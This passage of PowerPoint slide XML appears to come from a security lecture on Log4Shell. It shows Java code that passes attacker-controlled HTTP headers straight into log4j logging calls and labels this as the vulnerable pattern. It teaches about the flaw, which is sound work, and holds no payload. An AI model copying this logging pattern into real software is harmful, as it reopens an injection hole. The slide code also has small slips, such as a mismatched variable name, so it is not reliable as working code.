              </a:solidFill>
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A log string (info, error) contains a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> stores an input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>controlled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> by attackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9FB1A1-005D-5713-EA00-4209B5DE9C14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726829" y="3286125"/>
            <a:ext cx="10431586" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import org.apache.logging.log4j.Logger;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import org.apache.logging.log4j.LogManager;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Logger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LogManager.getLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger.error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Logging Error - {}!", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Log the User-Agent header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>httpExchange.getRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.info("User-Agent: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Log the Cookies header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>httpExchange.getRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“Cookies");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.info("Cookies: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Log the X-Api-Server header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>httpExchange.getRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>X-Api-Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.info("X-Api-Server: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apiServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{344BDF9A-0274-11B6-8027-D63DAF13427D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10582032" y="1204159"/>
            <a:ext cx="872355" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Pattern</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1E4B5F-42B8-9098-5CB8-7E9774CF35A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="3" idx="1"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5998308" y="1388825"/>
            <a:ext cx="4583724" cy="4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DD0395-EBDC-6C9E-D5BE-39ABBCC5BA31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10781325" y="3429000"/>
            <a:ext cx="977191" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{996C4643-52F1-0CFD-1ADF-72C091DA4300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7705970" y="3681134"/>
            <a:ext cx="3001107" cy="68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F95AAF2-37F3-3C7D-232B-5AC7D24F27E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8468440" y="4793604"/>
            <a:ext cx="3090513" cy="203132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sz="1800" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cookies, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>X-Api-Server are input data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>controlled from a client (HTTP request). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>How attackers craft input will be discussed later.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{607EB9E6-8F27-FC86-B85C-D8AED0C92F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7557477" y="4793604"/>
            <a:ext cx="910964" cy="4348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90A21D56-21FB-E3F0-E6F7-05D4A19AFFAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7018215" y="5469175"/>
            <a:ext cx="1450226" cy="641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E937AFAA-B291-320C-69B5-B7B16272DD74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7557477" y="5668229"/>
            <a:ext cx="910964" cy="82464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8826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9293-E137-0A01-E1AD-5234103E8FF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A simple web application with a vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{427BCB36-41E6-D162-26DF-F5C037725048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7548664" y="1825624"/>
            <a:ext cx="3805136" cy="4535203"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A part of a web application written in Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>uses Spring Framework, commonly used for building web applications. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>It's a basic example of how web applications can handle and respond to HTTP requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Logs information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The code defines a method that handles GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> (from clients/users) to the root URL of a web application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>extracts the API version from an HTTP header, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>logs the API version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>responds with a "Hello, world!" message to the client. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FB37CCD-6E90-7783-C8C6-E034B36553B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="780302" y="1699480"/>
            <a:ext cx="6645216" cy="4793395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC91129B-96CD-E554-D17B-B71F52A12512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2524057" y="6369620"/>
            <a:ext cx="6377666" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>https://github.com/christophetd/log4shell-vulnerable-app/blob/main/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C000124-0A4A-3953-703C-F901995A3295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4532923" y="3103881"/>
            <a:ext cx="2774462" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Logging info to help developers keep track of what's happening in the application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284958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F044EA3-0EAE-EC28-6AE2-70DFE343B998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="872679" y="2543385"/>
            <a:ext cx="9938825" cy="3724611"/>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342900" indent="-342900" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>@GetMapping("/")</a:t>
            </a:r>
            <a:r>
